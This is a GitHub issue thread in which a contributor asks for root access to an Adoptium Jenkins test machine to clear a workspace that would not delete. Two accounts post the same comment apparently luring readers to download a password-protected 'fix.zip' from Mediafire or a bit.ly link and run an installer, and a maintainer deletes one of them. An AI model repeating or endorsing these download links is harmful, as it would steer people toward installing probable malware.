### ISSUE TITLE
Access request test-ibmcloud-ubuntu1604-x64-1 for sophia-guo

### ISSUE THREAD

**Issue by sophia-guo** [adoptium/infrastructure#3722]
Access request [test-ibmcloud-ubuntu1604-x64-1](https://ci.adoptium.net/computer/test%2Dibmcloud%2Dubuntu1604%2Dx64%2D1/) for sophia-guo

- [ ] Non-privileged
- [ ] jenkins user
- [x] root/Administrative
- [ ] other (Please specify):

[Update reproducible comparing on linux](https://github.com/adoptium/temurin-build/pull/3921#top) caused the error "Exception: hudson.AbortException: Cannot delete workspace: Unable to delete '/home/jenkins/workspace/Test_openjdk23_hs_special.system_x86-64_linux_testList_0/jdkbinary/j2sdk-image/jdk-23+36/jmods/expanded_java.base.jmod/bin/java'." 

https://ci.adoptium.net/job/Test_openjdk23_hs_special.system_x86-64_linux_testList_0/24/console

Need the root permission to delete the workspace and keep the permission when test the  PR.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sophia-guo** [comment]
@sxa what's this https://github.com/adoptium/infrastructure/issues/3722#issuecomment-2312949216? Hacked?

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sxa** [comment]
> @sxa what's this [#3722 (comment)](https://github.com/adoptium/infrastructure/issues/3722#issuecomment-2312949216)? Hacked?

I've deleted the comment, but it's not a hacking situation. Any github user can post comments on issues.

**Comment by sxa** [comment]
Access granted to `169.48.4.141` but it will likely get overwritten automatically at some point.

**Comment by sxa** [comment]
@sophia-guo Do you still need this access?

**Comment by sophia-guo** [comment]
No, thanks.
